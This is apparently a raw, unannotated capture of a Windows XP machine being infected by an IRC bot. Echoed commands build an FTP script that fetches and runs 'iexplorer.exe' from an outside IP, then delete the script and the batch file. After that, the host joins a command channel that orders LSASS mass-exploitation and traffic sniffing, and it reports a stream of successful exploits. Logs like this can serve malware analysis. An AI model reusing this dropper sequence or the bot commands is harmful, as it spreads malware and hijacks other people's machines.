Client: echo open 86.133.243.48 4681>.pif C:\\\\WINDOWS\\\\system32>


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	echo open 86.133.243.48 4681>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo iexplorer.exe >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINDOWS\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,150,4 
ATTACKER:	200  
ATTACKER:	RETR iexplorer.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `ewstfuznUSER `ewstfuzn 0 0 :`ewstfuzn 
ATTACKER:	:aaa.23215.com 001 `ewstfuzn :time, `ewstfuzn!~ewstfuzn@192.168.1.150:aaa.23215.com 005 `ewstfuzn MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.23215.com 005 `ewstfuzn WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.23215.com 422 `ewstfuzn :MOTD File is missing:`ewstfuzn MODE `ewstfuzn :+i 
VICTIM:  	JOIN #.has hs 
ATTACKER:	:`ewstfuzn!~ewstfuzn@192.168.1.150 JOIN :#.has:aaa.23215.com 332 `ewstfuzn #.has :.join #.k `sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s:aaa.23215.com 333 `ewstfuzn #.has Hs 1218041311:aaa.23215.com 353 `ewstfuzn @ #.has :`ewstfuzn @cd @Hs :aaa.23215.com 366 `ewstfuzn #.has :End of /NAMES list. 
VICTIM:  	USERHOST `ewstfuznJOIN #.has hsUSERHOST `ewstfuznJOIN #.has hsUSERHOST `ewstfuzn 
ATTACKER:	:aaa.23215.com 302 `ewstfuzn :`ewstfuzn=+~ewstfuzn@192.168.1.150    :aaa.23215.com 302 `ewstfuzn :`ewstfuzn=+~ewstfuzn@192.168.1.150    :aaa.23215.com 302 `ewstfuzn :`ewstfuzn=+~ewstfuzn@192.168.1.150     
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.85.220.83) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja):aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.43.33.174) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja):aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.94.34.248) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja):aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.144.253.200) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.32.219.44) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.243.103.235) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja):aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.27.102.3) 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.147.228.90) 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.189.14.232) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.150 on 185 
ATTACKER:	:aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja):aaa.23215.com 404 `ewstfuzn #.lagja :No external channel messages (#.lagja)